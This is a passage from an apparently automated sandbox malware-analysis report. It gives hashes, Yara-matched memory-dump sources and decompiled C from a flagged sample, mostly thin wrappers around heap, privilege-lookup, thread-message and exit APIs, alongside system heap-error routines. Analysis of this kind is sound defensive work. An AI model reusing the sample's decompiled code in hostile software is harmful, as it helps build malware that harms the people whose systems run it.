                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                      • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                      • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f99cc7b63bb3816d4bd9ff71aad732e164d7ea1779664a222078b3ad2b0b2c81
                                                                      • Instruction ID: 805eb357daac78acba7b1ddbc40b622d27022bec3dc3e7796499cd02f3b6cb89
                                                                      • Opcode Fuzzy Hash: f99cc7b63bb3816d4bd9ff71aad732e164d7ea1779664a222078b3ad2b0b2c81
                                                                      • Instruction Fuzzy Hash: 2290026570100502D24171694444616000A97D0381F91C032A1014595ECA658992F171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 028da423b9d82a95cf7fca0aa8ca6cc8c618ffc768bca60d803f029dcdfd4f5b
                                                                      • Instruction ID: 290410979948eddf751ed96be0d59bbe9f7c9c0565da778d33a26746ad25b457
                                                                      • Opcode Fuzzy Hash: 028da423b9d82a95cf7fca0aa8ca6cc8c618ffc768bca60d803f029dcdfd4f5b
                                                                      • Instruction Fuzzy Hash: 6B90027530100413D25161694544707000997D0381F91C422A0414598D96968952F161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 1555c7641540a3f0e030e2e107353c7545897e333335aff0200793f3eb503c55
                                                                      • Instruction ID: 7a6ea18da0d73e6da52ca4e08fb13e9e7e56090b0ef09c7d7c8c64ccb55d1192
                                                                      • Opcode Fuzzy Hash: 1555c7641540a3f0e030e2e107353c7545897e333335aff0200793f3eb503c55
                                                                      • Instruction Fuzzy Hash: 4A900265342041525685B16944445074006A7E0381791C022A1404990C85669856E661
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: e4a9fb299502241d8144f084072f6df997d099a131642f60c6fec483d58d63c2
                                                                      • Instruction ID: ff24f4abbd72a8d7703755405a9cda36a8a422549103b8ddb48c5b9a763ccb58
                                                                      • Opcode Fuzzy Hash: e4a9fb299502241d8144f084072f6df997d099a131642f60c6fec483d58d63c2
                                                                      • Instruction Fuzzy Hash: 8B9002A534100442D24061694454B060005D7E1341F51C025E1054594D8659CC52B166
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 0f4a14d6060ab2811462594daf324f98d5976ef906b1a9f8aa2b13295fd088cf
                                                                      • Instruction ID: a3edbfe77da89c07e5fb030969613d01f659f65a11952e03f46687cacc7e653a
                                                                      • Opcode Fuzzy Hash: 0f4a14d6060ab2811462594daf324f98d5976ef906b1a9f8aa2b13295fd088cf
                                                                      • Instruction Fuzzy Hash: 009002A530200003424571694454616400A97E0341B51C031E10045D0DC5658891B165
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 18427c37b5ff7e1b3d8e402d5ff5799f8c344e782c155a0840cc3387f263d261
                                                                      • Instruction ID: 976f5f5dc5f2cd058fdeac6afae7e8ec698f0d5c89e797fa08b8b9b9a9726a3b
                                                                      • Opcode Fuzzy Hash: 18427c37b5ff7e1b3d8e402d5ff5799f8c344e782c155a0840cc3387f263d261
                                                                      • Instruction Fuzzy Hash: FD9002B530100402D28071694444746000597D0341F51C021A5054594E86998DD5B6A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
                                                                      				char _v67;
                                                                      				char _v68;
                                                                      				void* _t12;
                                                                      				intOrPtr* _t13;
                                                                      				int _t14;
                                                                      				long _t21;
                                                                      				intOrPtr* _t25;
                                                                      				void* _t26;
                                                                      				void* _t30;
                                                                      
                                                                      				_t30 = __eflags;
                                                                      				_v68 = 0;
                                                                      				L00419D20( &_v67, 0, 0x3f);
                                                                      				E0041A900( &_v68, 3);
                                                                      				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                      				_t13 = L00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                      				_t25 = _t13;
                                                                      				if(_t25 != 0) {
                                                                      					_t21 = _a8;
                                                                      					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                      					_t32 = _t14;
                                                                      					if(_t14 == 0) {
                                                                      						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                      					}
                                                                      					return _t14;
                                                                      				}
                                                                      				return _t13;
                                                                      			}













                                                                      APIs
                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                      				char _t10;
                                                                      				void* _t15;
                                                                      
                                                                      				_t3 = _a4 + 0xc74; // 0xc74
                                                                      				L00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                      				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                      				return _t10;
                                                                      			}






                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                      				void* _t10;
                                                                      				void* _t15;
                                                                      
                                                                      				L00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                      				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                      				return _t10;
                                                                      			}






                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                      				int _t10;
                                                                      				void* _t15;
                                                                      
                                                                      				L00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                      				return _t10;
                                                                      			}






                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00418510(intOrPtr _a4, int _a8) {
                                                                      				void* _t10;
                                                                      
                                                                      				_t5 = _a4;
                                                                      				L00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                      				ExitProcess(_a8);
                                                                      			}





                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                      • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                      • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 50%
                                                                      			E0041850E(intOrPtr _a4, int _a8) {
                                                                      				void* _t10;
                                                                      
                                                                      				asm("sti");
                                                                      				asm("sbb dl, [ebp-0x75]");
                                                                      				_t5 = _a4;
                                                                      				E00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                      				ExitProcess(_a8);
                                                                      			}





                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: 495936aa1f454278ece612d449318c9a6478e82203cf7e709259bd8a785b447f
                                                                      • Instruction ID: f1a7219ed0e73f1c768c5849778d90572584f2c3e7722ef04f5753e2d938b4af
                                                                      • Opcode Fuzzy Hash: 495936aa1f454278ece612d449318c9a6478e82203cf7e709259bd8a785b447f
                                                                      • Instruction Fuzzy Hash: F1D05B756002047BD730DF75CCC5FD73B689F59750F15855CB95DAB242C931AA04CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 7b4d59301c6ac7c6f914524daee675cbd60f169d370a4182ac9f496176946508
                                                                      • Instruction ID: ebb6eae82783042fdfa7b67d75d166a2d69caf98c6c08761ff6f1cae3a7c831a
                                                                      • Opcode Fuzzy Hash: 7b4d59301c6ac7c6f914524daee675cbd60f169d370a4182ac9f496176946508
                                                                      • Instruction Fuzzy Hash: BCB092B2A064C5CAEB51E7B04A08B2B7A04BBE0741F26C062E2020681A47B8C491F6B6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Strings
                                                                      • Go determine why that thread has not released the critical section., xrefs: 00AAB3C5
                                                                      • The resource is owned shared by %d threads, xrefs: 00AAB37E
                                                                      • The critical section is owned by thread %p., xrefs: 00AAB3B9
                                                                      • *** then kb to get the faulting stack, xrefs: 00AAB51C
                                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00AAB38F
                                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 00AAB48F
                                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00AAB2F3
                                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00AAB3D6
                                                                      • *** enter .exr %p for the exception record, xrefs: 00AAB4F1
                                                                      • This failed because of error %Ix., xrefs: 00AAB446
                                                                      • The instruction at %p tried to %s , xrefs: 00AAB4B6
                                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00AAB53F
                                                                      • <unknown>, xrefs: 00AAB27E, 00AAB2D1, 00AAB350, 00AAB399, 00AAB417, 00AAB48E
                                                                      • The instruction at %p referenced memory at %p., xrefs: 00AAB432
                                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00AAB484
                                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00AAB2DC
                                                                      • read from, xrefs: 00AAB4AD, 00AAB4B2
                                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00AAB476
                                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 00AAB352
                                                                      • a NULL pointer, xrefs: 00AAB4E0
                                                                      • *** Inpage error in %ws:%s, xrefs: 00AAB418
                                                                      • an invalid address, %p, xrefs: 00AAB4CF
                                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00AAB39B
                                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00AAB314
                                                                      • The resource is owned exclusively by thread %p, xrefs: 00AAB374
                                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00AAB305
                                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00AAB47D
                                                                      • *** enter .cxr %p for the context, xrefs: 00AAB50D
                                                                      • write to, xrefs: 00AAB4A6
                                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00AAB323
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                      • API String ID: 0-108210295
                                                                      • Opcode ID: 47dded41aac772e627116f0fa754a513110a85f3ec8421f3f57f5bcbb035aea6
                                                                      • Instruction ID: 2fe6b8618f5c3e011d8c8b535b71ab330b3ee8b95c1081585de64504826e1fa6
                                                                      • Opcode Fuzzy Hash: 47dded41aac772e627116f0fa754a513110a85f3ec8421f3f57f5bcbb035aea6
                                                                      • Instruction Fuzzy Hash: 9D810275A11210FFDB22AB168C4AE7B3B36AF8BB55F054444F8062F593D3618C51DBB2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 44%
                                                                      			E00AB1C06() {
                                                                      				signed int _t27;
                                                                      				char* _t104;
                                                                      				char* _t105;
                                                                      				intOrPtr _t113;
                                                                      				intOrPtr _t115;
                                                                      				intOrPtr _t117;
                                                                      				intOrPtr _t119;
                                                                      				intOrPtr _t120;
                                                                      
                                                                      				_t105 = 0x9d48a4;
                                                                      				_t104 = "HEAP: ";
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      					_push(_t104);
                                                                      					E009FB150();
                                                                      				} else {
                                                                      					E009FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      				}
                                                                      				_push( *0xae589c);
                                                                      				E009FB150("Heap error detected at %p (heap handle %p)\n",  *0xae58a0);
                                                                      				_t27 =  *0xae5898; // 0x0
                                                                      				if(_t27 <= 0xf) {
                                                                      					switch( *((intOrPtr*)(_t27 * 4 +  &M00AB1E96))) {
                                                                      						case 0:
                                                                      							_t105 = "heap_failure_internal";
                                                                      							goto L21;
                                                                      						case 1:
                                                                      							goto L21;
                                                                      						case 2:
                                                                      							goto L21;
                                                                      						case 3:
                                                                      							goto L21;
                                                                      						case 4:
                                                                      							goto L21;
                                                                      						case 5:
                                                                      							goto L21;
                                                                      						case 6:
                                                                      							goto L21;
                                                                      						case 7:
                                                                      							goto L21;
                                                                      						case 8:
                                                                      							goto L21;
                                                                      						case 9:
                                                                      							goto L21;
                                                                      						case 0xa:
                                                                      							goto L21;
                                                                      						case 0xb:
                                                                      							goto L21;
                                                                      						case 0xc:
                                                                      							goto L21;
                                                                      						case 0xd:
                                                                      							goto L21;
                                                                      						case 0xe:
                                                                      							goto L21;
                                                                      						case 0xf:
                                                                      							goto L21;
                                                                      					}
                                                                      				}
                                                                      				L21:
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      					_push(_t104);
                                                                      					E009FB150();
                                                                      				} else {
                                                                      					E009FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      				}
                                                                      				_push(_t105);
                                                                      				E009FB150("Error code: %d - %s\n",  *0xae5898);
                                                                      				_t113 =  *0xae58a4; // 0x0
                                                                      				if(_t113 != 0) {
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E009FB150();
                                                                      					} else {
                                                                      						E009FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					E009FB150("Parameter1: %p\n",  *0xae58a4);
                                                                      				}
                                                                      				_t115 =  *0xae58a8; // 0x0
                                                                      				if(_t115 != 0) {
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E009FB150();
                                                                      					} else {
                                                                      						E009FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					E009FB150("Parameter2: %p\n",  *0xae58a8);
                                                                      				}
                                                                      				_t117 =  *0xae58ac; // 0x0
                                                                      				if(_t117 != 0) {
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E009FB150();
                                                                      					} else {
                                                                      						E009FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					E009FB150("Parameter3: %p\n",  *0xae58ac);
                                                                      				}
                                                                      				_t119 =  *0xae58b0; // 0x0
                                                                      				if(_t119 != 0) {
                                                                      					L41:
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E009FB150();
                                                                      					} else {
                                                                      						E009FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					_push( *0xae58b4);
                                                                      					E009FB150("Last known valid blocks: before - %p, after - %p\n",  *0xae58b0);
                                                                      				} else {
                                                                      					_t120 =  *0xae58b4; // 0x0
                                                                      					if(_t120 != 0) {
                                                                      						goto L41;
                                                                      					}
                                                                      				}
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      					_push(_t104);
                                                                      					E009FB150();
                                                                      				} else {
                                                                      					E009FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      				}
                                                                      				return E009FB150("Stack trace available at %p\n", 0xae58c0);
                                                                      			}












                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                      • API String ID: 0-2897834094
                                                                      • Opcode ID: 31d0a9f8ffcba6a2e571de103466ad676ada36117106fe61630af03fd94f105d
                                                                      • Instruction ID: dad89f98ce5dbd59901f591e0b05b73106b13271ac1b8bf19f581b4a82dd3229
                                                                      • Opcode Fuzzy Hash: 31d0a9f8ffcba6a2e571de103466ad676ada36117106fe61630af03fd94f105d
                                                                      • Instruction Fuzzy Hash: D561F432A54688DFC7229F95E8A5E7073F8EB44B34B59803AF9096F353D7309C519B0A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 96%
                                                                      			E00A03D34(signed int* __ecx) {
                                                                      				signed int* _v8;
                                                                      				char _v12;
                                                                      				signed int* _v16;
                                                                      				signed int* _v20;
                                                                      				char _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				char _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int* _v48;
                                                                      				signed int* _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				char _v68;
                                                                      				signed int _t140;
                                                                      				signed int _t161;
                                                                      				signed int* _t236;
                                                                      				signed int* _t242;
                                                                      				signed int* _t243;
                                                                      				signed int* _t244;
                                                                      				signed int* _t245;
                                                                      				signed int _t255;
                                                                      				void* _t257;
                                                                      				signed int _t260;
                                                                      				void* _t262;
                                                                      				signed int _t264;
                                                                      				void* _t267;
                                                                      				signed int _t275;
                                                                      				signed int* _t276;
                                                                      				short* _t277;
                                                                      				signed int* _t278;
                                                                      				signed int* _t279;
                                                                      				signed int* _t280;
                                                                      				short* _t281;
                                                                      				signed int* _t282;
                                                                      				short* _t283;
                                                                      				signed int* _t284;
                                                                      				void* _t285;
                                                                      
                                                                      				_v60 = _v60 | 0xffffffff;
                                                                      				_t280 = 0;
                                                                      				_t242 = __ecx;
                                                                      				_v52 = __ecx;
                                                                      				_v8 = 0;
                                                                      				_v20 = 0;
                                                                      				_v40 = 0;
                                                                      				_v28 = 0;
                                                                      				_v32 = 0;
                                                                      				_v44 = 0;
                                                                      				_v56 = 0;
                                                                      				_t275 = 0;
                                                                      				_v16 = 0;
                                                                      				if(__ecx == 0) {
                                                                      					_t280 = 0xc000000d;
                                                                      					_t140 = 0;
                                                                      					L50:
                                                                      					 *_t242 =  *_t242 | 0x00000800;
                                                                      					_t242[0x13] = _t140;
                                                                      					_t242[0x16] = _v40;
                                                                      					_t242[0x18] = _v28;
                                                                      					_t242[0x14] = _v32;
                                                                      					_t242[0x17] = _t275;
                                                                      					_t242[0x15] = _v44;
                                                                      					_t242[0x11] = _v56;
                                                                      					_t242[0x12] = _v60;
                                                                      					return _t280;
                                                                      				}
                                                                      				if(E00A01B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                      					_v56 = 1;
                                                                      					if(_v8 != 0) {
                                                                      						L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                      					}
                                                                      					_v8 = _t280;
                                                                      				}
                                                                      				if(E00A01B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                      					_v60 =  *_v8;
                                                                      					L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                      					_v8 = _t280;
                                                                      				}
                                                                      				if(E00A01B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      					L16:
                                                                      					if(E00A01B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      						L28:
                                                                      						if(E00A01B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      							L46:
                                                                      							_t275 = _v16;
                                                                      							L47:
                                                                      							_t161 = 0;
                                                                      							L48:
                                                                      							if(_v8 != 0) {
                                                                      								L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                      							}
                                                                      							_t140 = _v20;
                                                                      							if(_t140 != 0) {
                                                                      								if(_t275 != 0) {
                                                                      									L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                      									_t275 = 0;
                                                                      									_v28 = 0;
                                                                      									_t140 = _v20;
                                                                      								}
                                                                      							}
                                                                      							goto L50;
                                                                      						}
                                                                      						_t167 = _v12;
                                                                      						_t255 = _v12 + 4;
                                                                      						_v44 = _t255;
                                                                      						if(_t255 == 0) {
                                                                      							_t276 = _t280;
                                                                      							_v32 = _t280;
                                                                      						} else {
                                                                      							_t276 = L00A14620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                      							_t167 = _v12;
                                                                      							_v32 = _t276;
                                                                      						}
                                                                      						if(_t276 == 0) {
                                                                      							_v44 = _t280;
                                                                      							_t280 = 0xc0000017;
                                                                      							goto L46;
                                                                      						} else {
                                                                      							E00A3F3E0(_t276, _v8, _t167);
                                                                      							_v48 = _t276;
                                                                      							_t277 = E00A41370(_t276, 0x9d4e90);
                                                                      							_pop(_t257);
                                                                      							if(_t277 == 0) {
                                                                      								L38:
                                                                      								_t170 = _v48;
                                                                      								if( *_v48 != 0) {
                                                                      									E00A3BB40(0,  &_v68, _t170);
                                                                      									if(L00A043C0( &_v68,  &_v24) != 0) {
                                                                      										_t280 =  &(_t280[0]);
                                                                      									}
                                                                      								}
                                                                      								if(_t280 == 0) {
                                                                      									_t280 = 0;
                                                                      									L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                      									_v44 = 0;
